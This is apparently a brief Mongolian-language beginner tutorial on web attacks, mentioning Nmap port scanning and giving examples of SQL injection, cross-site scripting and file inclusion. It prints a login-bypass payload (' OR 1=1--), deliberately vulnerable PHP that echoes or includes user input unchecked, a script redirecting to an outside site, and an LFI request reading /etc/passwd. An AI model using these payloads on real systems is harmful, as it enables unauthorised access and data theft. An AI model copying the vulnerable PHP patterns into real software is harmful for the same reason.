нээлттэй порт шалгагч NMAP
- SQL Injection
- XSS (Cross-Site Scripting)
- RFI/LFI (Remote/Local File Include)
SQL Injection жишээ
"SELECT `ID` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1--"--" sql нь энэ тэмдэгтээс хойшх камандийг биелүүлдэггүй.
'' or 1=1 энийг хараад sql мэддэг хүмүүс гадарлах байх
хэрэв зэ нууц үг тэнцэхгүй бол 1 нь 1 тэй тэнцүү юу гэсэн үг.
user name : Administrator
password: ' OR 1=1--
ингээд нэвтрэх хуудас дээр бичвэл admin эрхээр орох боломтой мэдээж ямар нэгэн filter тавиагүй үед;
XSS (Cross-Site Scripting)
Ихэнх хайлтийн хуудасны жишээ
= $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>"You searched for (<)script(>)window.location='http://xxx.mn/'(<)/script(>). There were no results found"
гэсэн мэдээлэл ийг хиих ба энэ нь http://xxx.mn гэсэн сайтийг дахин дахин дуудна(loop) гэсэн үг.
browser нь loop ийг хаадаг ба browser ийн тохиргоонд байдаг
RFI/LFI (Remote/Local File Include)
index.php ийн жишээ
= $_GET['p'];
if (isset($page)) {
include($page);
} else {
include("home.php");
}
?>
LFI "index.php?p=/etc/passwd";
гэх мэтийн өгөгдөл оруулж болох аж
